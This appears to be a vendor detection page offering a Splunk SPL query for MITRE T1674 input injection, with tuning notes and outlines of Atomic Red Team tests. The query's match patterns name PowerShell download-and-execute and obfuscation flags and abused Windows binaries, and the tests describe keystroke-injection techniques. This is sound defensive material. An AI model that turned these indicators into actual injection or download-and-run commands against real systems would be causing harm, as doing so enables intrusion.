T1674 Splunk · SPL

Detect Input Injection in Splunk

This detection identifies adversary attempts to simulate keyboard input to execute commands or manipulate applications on behalf of victims. Input injection manifests through HID (Human Interface Device) emulation via malicious USB devices, programmatic keystroke injection via Win32 APIs (SendInput, keybd_event, PostMessage with WM_KEYDOWN/WM_KEYUP), and monitoring of the Windows message loop to inject input into specific applications such as browsers. Key indicators include PowerShell or command interpreters spawning from interactive desktop processes (explorer.exe) with no visible user session context, rapid automated input sequences following USB device attachment, and browser processes receiving injected console commands characteristic of banking trojans like BackSwap that monitor for financial URLs and inject JavaScript via simulated keystrokes.

MITRE ATT&CK

Tactic
Execution
Technique
T1674 Input Injection
Canonical reference
https://attack.mitre.org/techniques/T1674/

SPL Detection Query

Splunk (SPL)
spl 
index=* sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
| eval ParentImage=lower(ParentImage), Image=lower(Image), CommandLine=lower(CommandLine)
| where (match(ParentImage, "(explorer\.exe|winlogon\.exe|userinit\.exe|sihost\.exe|taskhostw\.exe)$")
    AND match(Image, "(powershell\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|certutil\.exe)$")
    AND (match(CommandLine, "(-encodedcommand|-enc |-e |iex|invoke-expression|downloadstring|downloadfile|frombase64string|-windowstyle hidden|-noprofile|-noninteractive)")))
    OR (match(ParentImage, "(chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe|brave\.exe)$")
    AND match(Image, "(powershell\.exe|cmd\.exe|wscript\.exe|cscript\.exe)$"))
| eval InjectionType=case(
    match(ParentImage, "(chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe|brave\.exe)$"), "BrowserInputInjection",
    match(ParentImage, "(explorer\.exe|winlogon\.exe|userinit\.exe|sihost\.exe|taskhostw\.exe)$"), "HIDKeystrokeInjection",
    true(), "Unknown")
| table _time, host, User, InjectionType, ParentImage, ParentProcessId, Image, ProcessId, CommandLine, Hashes
| sort -_time
high severity medium confidence

Sysmon Event ID 1 (Process Create) detection for input injection patterns. Identifies shell processes (PowerShell, cmd.exe) spawned from interactive desktop processes (explorer.exe, winlogon.exe) with encoded or obfuscated command lines indicative of HID/USB keystroke injection, as well as command shells spawned directly from browser processes indicative of BackSwap-style JavaScript injection attacks. Uses Sysmon's rich process creation telemetry including parent process tracking and command-line logging.

Data Sources

Sysmon

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • Desktop automation scripts using AutoHotkey, AutoIt, or similar tools that legitimately simulate keystrokes and launch processes
  • Enterprise software deployment tools that use user-context process spawning via explorer.exe shell execution
  • Accessibility software and voice-to-text tools that use keystroke simulation to interact with desktop applications
  • Browser-integrated development tools or IDE browser plugins that spawn terminal windows for developer workflows
  • Legitimate RPA (Robotic Process Automation) software during normal business process automation
Download portable Sigma rule (.yml)

Other platforms for T1674

Microsoft Sentinel (KQL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1PowerShell Keystroke Injection via SendKeys COM Object

    Expected signal: Sysmon Event ID 1: powershell.exe process creation with '-Command' and 'SendKeys' in CommandLine; subsequent notepad.exe process creation from shell parent

  2. Test 2Simulated HID USB Attack - AutoHotkey Keystroke Script

    Expected signal: Sysmon Event ID 1: AutoHotkey.exe spawning, followed by PowerShell process creation triggered by simulated Win+R keystrokes; DeviceProcessEvents showing explorer.exe as grandparent of PowerShell

  3. Test 3Browser Console JavaScript Injection via Clipboard and Simulated Keystrokes (BackSwap Simulation)

    Expected signal: Sysmon Event ID 1 or DeviceProcessEvents: PowerShell process with SendKeys and AppActivate in command line; clipboard write event followed by browser F12 key injection; browser console activity

  4. Test 4USB Rubber Ducky Payload Simulation - Direct Win32 API Keystroke Injection

    Expected signal: Sysmon Event ID 1: PowerShell with Add-Type and SendInput/DllImport in command or script content; DeviceImageLoadEvents for user32.dll loaded into PowerShell process; Security Event 4688 if process auditing enabled

Last updated: 2026-03-20 Research depth: deep
References (9)

Unlock Pro Content

Get the full detection package for T1674 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Related Techniques

T1059.001PowerShellT1059.007JavaScriptT1091Replication Through Removable MediaT1204.002Malicious FileT1115Clipboard DataT1559.001Component Object ModelT1056.001Keylogging

Same Tactic: Execution

Popular Detections